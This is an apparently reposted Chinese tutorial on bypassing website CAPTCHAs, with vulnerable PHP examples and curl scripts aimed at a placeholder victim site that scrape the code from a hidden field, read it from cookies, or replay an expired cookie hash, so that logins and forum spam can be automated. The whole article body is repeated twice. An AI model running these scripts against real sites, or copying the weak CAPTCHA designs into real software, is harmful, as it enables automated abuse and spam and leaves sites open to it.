黑客如何破解验证码机制
互联网 发布时间:2008-10-08 19:01:42 作者:佚名 我要评论
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。 很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。 验证码在网页中的例子: CODE: <?
/*
* Filename: authpage.php
* Author: hutuworm
* Date: 2003-04-28
* @Copyleft hutuworm.org
*/ srand((double)microtime()*1000000); //验证用户输入是否和验证码一致
if(isset($HTTP_POST_VARS['authinput']))
{
if(strcmp($HTTP_POST_VARS['authnum'],$HTTP_POST_VARS['authinput'])==0)
echo "验证成功!";
else
echo "验证失败!";
}
//生成新的四位整数验证码
while(($authnum=rand()000)<1000);
?>
<form action=authpage.php method=post>
<table>
请输入验证码:<input type=text name=authinput style="width: 80px"><br>
<input type=submit name="验证" value="提交验证码">
<input type=hidden name=authnum value=<? echo $authnum; ?>>
<img src=authimg.php?authnum=<? echo $authnum; ?>>
</table>
</form> [Copy to clipboard] 以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。 CODE: #!/bin/sh
curl [url]http://www.vicitm.org/authpage.php[/url]
authinput=`grep '<input type=hidden name=authnum value=[[:digit:]]\{4\}>' grep.txt | sed -e 's/[^0-9]//g'` #得到网页中的 authnum
curl [url]http://www.vicitm.org/authpage.php[/url] -d name=hacker -d submit="验证" -d authnum=$authnum [Copy to clipboard] CODE: session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum); ...
<input type=text name=authnum maxlength=4><img src=get_code.php>
... if($number != $login_check_number || empty($number))
{
print("校验码不正确!");
die();
}
[Copy to clipboard] 第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。 CODE: #!/bin/sh
$username=hacker
$password=hackme
curl [url]http://www.vicitm.org/index.php[/url] -c common_cookie # 接受服务器的初始cookies
curl [url]http://www.vicitm.org/get_code.php[/url] -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl [url]http://www.victim.org/login.php[/url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用 cookies中的验证码登陆 [Copy to clipboard] 更高级的验证码。(好像本论坛的就是这种。。。。) 有一类验证码比以上两种验证码要高级一些,它使用如下算法: 1、服务器生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
3、hash在cookie中被发送到客户端
4、客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。 特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。 对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时 ,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。 如:
先从服务器上下载一张验证码图片: curl http://www.victim.org/get_code.php -c cookie -o auth.png 人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。 机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破 CODE: $savecookie=294b506f05f896dcbb3a0dde86a5e36c
$num=7701
$username=hacker
$password=hackme curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的hash
echo "[url]www.victim.org[/url] FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码
mv tmp.$username $username.cookie
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d authnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。 [Copy to clipboard] 最高级的验证码。 它使用如下方法: 1、服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3、hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以是session id)
4、seq被作为cookies发送给客户端。
5、客户以图片输入验证码。
6、服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
7、一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。 特点: ×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。 弱点: OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证) 对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。 CODE: curl [url]http://www.victim.org/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。 很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。 验证码在网页中的例子: CODE: <?
/*
* Filename: authpage.php
* Author: hutuworm
* Date: 2003-04-28
* @Copyleft hutuworm.org
*/ srand((double)microtime()*1000000); //验证用户输入是否和验证码一致
if(isset($HTTP_POST_VARS['authinput']))
{
if(strcmp($HTTP_POST_VARS['authnum'],$HTTP_POST_VARS['authinput'])==0)
echo "验证成功!";
else
echo "验证失败!";
}
//生成新的四位整数验证码
while(($authnum=rand()000)<1000);
?>
<form action=authpage.php method=post>
<table>
请输入验证码:<input type=text name=authinput style="width: 80px"><br>
<input type=submit name="验证" value="提交验证码">
<input type=hidden name=authnum value=<? echo $authnum; ?>>
<img src=authimg.php?authnum=<? echo $authnum; ?>>
</table>
</form> [Copy to clipboard] 以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。 CODE: #!/bin/sh
curl [url]http://www.vicitm.org/authpage.php[/url]
authinput=`grep '<input type=hidden name=authnum value=[[:digit:]]\{4\}>' grep.txt | sed -e 's/[^0-9]//g'` #得到网页中的 authnum
curl [url]http://www.vicitm.org/authpage.php[/url] -d name=hacker -d submit="验证" -d authnum=$authnum [Copy to clipboard] CODE: session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum); ...
<input type=text name=authnum maxlength=4><img src=get_code.php>
... if($number != $login_check_number || empty($number))
{
print("校验码不正确!");
die();
}
[Copy to clipboard] 第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。 CODE: #!/bin/sh
$username=hacker
$password=hackme
curl [url]http://www.vicitm.org/index.php[/url] -c common_cookie # 接受服务器的初始cookies
curl [url]http://www.vicitm.org/get_code.php[/url] -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl [url]http://www.victim.org/login.php[/url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用 cookies中的验证码登陆 [Copy to clipboard] 更高级的验证码。(好像本论坛的就是这种。。。。) 有一类验证码比以上两种验证码要高级一些,它使用如下算法: 1、服务器生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
3、hash在cookie中被发送到客户端
4、客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。 特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。 对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时 ,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。 如:
先从服务器上下载一张验证码图片: curl http://www.victim.org/get_code.php -c cookie -o auth.png 人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。 机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破 CODE: $savecookie=294b506f05f896dcbb3a0dde86a5e36c
$num=7701
$username=hacker
$password=hackme curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的hash
echo "[url]www.victim.org[/url] FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码
mv tmp.$username $username.cookie
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d authnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。 [Copy to clipboard] 最高级的验证码。 它使用如下方法: 1、服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3、hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以是session id)
4、seq被作为cookies发送给客户端。
5、客户以图片输入验证码。
6、服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
7、一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。 特点: ×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。 弱点: OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证) 对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。 CODE: curl [url]http://www.victim.org/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。
相关文章
- “CMOS密码”就是通常所说的“开机密码”,主要是为了防止别人使用自已的计算机,设置的一个屏障2023-08-01
QQScreenShot之逆向并提取QQ截图--OCR和其他功能
上一篇文章逆向并提取QQ截图没有提取OCR功能, 再次逆向我发现是可以本地调用QQ的OCR的,但翻译按钮确实没啥用, 于是Patch了翻译按钮事件, 改为了将截图用百度以图搜图搜索.2023-02-04- QQ截图是我用过的最好用的截图工具, 由于基本不在电脑上登QQ了, 于是就想将其提取出独立版目前除了屏幕录制功能其他都逆出来了, 在此分享一下2023-02-04
非系统分区使用BitLocker加密导致软件无法安装的解决方法
很多电脑用户在考虑自己电脑磁盘分区安全时会采用 Windows 自带的 BitLocker 加密工具对电脑磁盘分区进行加密。但有些人加密后就会忘记自己设置的密码从而导致在安装其它软2020-11-25防止离职员工带走客户、防止内部员工泄密、避免华为员工泄密事件的发生
这篇文章为大家详细介绍了如何才能防止离职员工带走客户、防止内部员工泄密、避免华为员工泄密事件的发生,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2017-06-27彻底防止计算机泄密、重要涉密人员离职泄密、涉密人员离岗离职前防范举
近些年企业商业机密泄漏的事件屡有发生,这篇文章主要教大家如何彻底防止计算机泄密、重要涉密人员离职泄密、告诉大家涉密人员离岗离职前的防范举措,具有一定的参考价值,2017-06-27- 最近有电脑用户反应量子计算机可以破解下载的所有的加密算法吗?其实也不是不可以,下面虚拟就为大家讲解买台量子计算机,如何分分钟破解加密算法2016-09-26
怎么破解Webshell密码 Burpsuite破解Webshell密码图文教程
webshell是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,一种网页后门。黑客通常会通过它控制别人网络服务器,那么怎么破解webshell密码呢?一起来看看吧2016-09-19- 本文讨论了针对Linux系统全盘加密的冷启动攻击,大家都认为这种攻击是可行的,但执行这么一次攻击有多难?攻击的可行性有多少呢?需要的朋友可以参考下2015-12-28
防止泄露公司机密、企业数据防泄密软件排名、电脑文件加密软件排行
面对日渐严重的内部泄密事件,我们如何守护企业的核心信息,如何防止内部泄密也就成了摆在各个企业领导面前的一大问题。其实,针对内网安全,防止内部信息泄漏早已有了比较2015-12-17
最新评论